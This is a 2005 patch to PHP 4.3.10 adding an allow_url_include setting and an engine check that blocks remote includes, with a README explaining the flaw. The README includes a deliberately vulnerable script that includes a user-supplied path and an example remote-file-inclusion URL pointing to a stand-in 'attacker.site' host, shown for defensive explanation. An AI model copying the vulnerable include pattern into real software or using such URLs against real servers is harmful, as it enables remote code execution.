diff -Naur php-4.3.10.orig/README.Security php-4.3.10/README.Security
--- php-4.3.10.orig/README.Security	1970-01-01 01:00:00.000000000 +0100
+++ php-4.3.10/README.Security	2005-03-01 22:35:15.000000000 +0100
@@ -0,0 +1,37 @@
+[2005-03-01] Tom Z. Meinlschmidt <tomas at meinlschmidt dot org>
+
+* added allow_url_include (On|Off) variable to php.ini and patch Zend due to
+  security reason. Streams like http/ftp allow attacker to perform cross-site
+  scripting attack, set allow_url_fopen to Off is not the right solution.
+  Safe mode DOESN'T change anything, so don't use it to secure THIS hole.
+
+  Example script:
+    <?php
+		
+		$page = $_GET['page'];
+		include ($page);
+	
+	?>
+
+	and attacker uses:
+	
+		http://some.host/script.php?page=http://attacker.site/hack.html ...
+
+  Solution:
+
+	Apply patch, set allow_url_include to Off, restart apache. And re-code your
+	scripts like this humbly example:
+
+	<?php
+	
+		$page = eregi_replace("[^a-z0-9]","",$_GET['page']);
+		$pages = array(
+			'info'		=>	'info/info_page.php',
+			'contact'	=>	'contact/contact.php'
+		);
+
+		$include_page = ($pages[$page]!="") ? $pages[$page] : "default.php";
+
+		include_once ( $include_page );
+	
+	?>
diff -Naur php-4.3.10.orig/Zend/zend_execute.c php-4.3.10/Zend/zend_execute.c
--- php-4.3.10.orig/Zend/zend_execute.c	2004-11-03 12:23:59.000000000 +0100
+++ php-4.3.10/Zend/zend_execute.c	2005-03-01 22:44:47.000000000 +0100
@@ -33,6 +33,8 @@
 #include "zend_execute_locks.h"
 #include "zend_ini.h"
 
+#include "main/php.h"
+
 #define get_zval_ptr(node, Ts, should_free, type) _get_zval_ptr(node, Ts, should_free TSRMLS_CC)
 #define get_zval_ptr_ptr(node, Ts, type) _get_zval_ptr_ptr(node, Ts TSRMLS_CC)
 
@@ -1035,6 +1037,8 @@
 {
 	zend_execute_data execute_data;
 
+	php_stream_wrapper *wrapper = NULL;
+
 	/* Initialize execute_data */
 	EX(fbc) = NULL;
 	EX(ce) = NULL;
@@ -2140,7 +2144,14 @@
 						convert_to_string(&tmp_inc_filename);
 						inc_filename = &tmp_inc_filename;
 					}
-
+					
+					wrapper = php_stream_locate_url_wrapper(inc_filename->value.str.val, NULL, STREAM_LOCATE_WRAPPERS_ONLY TSRMLS_CC);
+					if (wrapper != NULL && wrapper->is_url && !PG(allow_url_include)) {
+						zend_error(E_WARNING, "URL include is disabled in the server configuration");
+						NEXT_OPCODE();
+						break;
+					}
+					
 					return_value_used = RETURN_VALUE_USED(EX(opline));
 
 					switch (EX(opline)->op2.u.constant.value.lval) {
diff -Naur php-4.3.10.orig/main/main.c php-4.3.10/main/main.c
--- php-4.3.10.orig/main/main.c	2004-10-01 16:27:13.000000000 +0200
+++ php-4.3.10/main/main.c	2005-03-01 17:10:13.000000000 +0100
@@ -361,6 +361,7 @@
 	PHP_INI_ENTRY("disable_classes",			"",			PHP_INI_SYSTEM,		NULL)
 
 	STD_PHP_INI_BOOLEAN("allow_url_fopen",		"1",		PHP_INI_SYSTEM,		OnUpdateBool,			allow_url_fopen,			php_core_globals,	core_globals)
+	STD_PHP_INI_BOOLEAN("allow_url_include",	"1",		PHP_INI_SYSTEM,		OnUpdateBool,			allow_url_include,			php_core_globals,	core_globals)
 	STD_PHP_INI_BOOLEAN("always_populate_raw_post_data",		"0",		PHP_INI_SYSTEM|PHP_INI_PERDIR,		OnUpdateBool,			always_populate_raw_post_data,			php_core_globals,	core_globals)
 
 PHP_INI_END()
diff -Naur php-4.3.10.orig/main/php_globals.h php-4.3.10/main/php_globals.h
--- php-4.3.10.orig/main/php_globals.h	2003-05-18 12:22:16.000000000 +0200
+++ php-4.3.10/main/php_globals.h	2005-03-01 17:08:45.000000000 +0100
@@ -137,6 +137,7 @@
 	zend_bool during_request_startup;
 
 	zend_bool allow_url_fopen;
+	zend_bool allow_url_include;
 
 	zend_bool always_populate_raw_post_data;
 	
diff -Naur php-4.3.10.orig/php.ini-dist php-4.3.10/php.ini-dist
--- php-4.3.10.orig/php.ini-dist	2004-08-18 07:05:23.000000000 +0200
+++ php-4.3.10/php.ini-dist	2005-03-01 22:20:47.000000000 +0100
@@ -493,6 +493,11 @@
 ; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
 allow_url_fopen = On
 
+; Whether to allow the treatment of URLs (like http:// or ftp://) in include
+; include_once, require and require_once statements
+; due to security reasons, is strongly recommended to leave it Off as default
+allow_url_include = Off
+
 ; Define the anonymous ftp password (your email address)
 ;from="john@doe.com"
 
diff -Naur php-4.3.10.orig/php.ini-recommended php-4.3.10/php.ini-recommended
--- php-4.3.10.orig/php.ini-recommended	2004-08-18 07:05:23.000000000 +0200
+++ php-4.3.10/php.ini-recommended	2005-03-01 22:20:45.000000000 +0100
@@ -508,6 +508,11 @@
 ; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
 allow_url_fopen = On
 
+; Whether to allow the treatment of URLs (like http:// or ftp://) in include
+; include_once, require and require_once statements
+; due to security reasons, is strongly recommended to leave it Off as default
+allow_url_include = Off
+
 ; Define the anonymous ftp password (your email address)
 ;from="john@doe.com"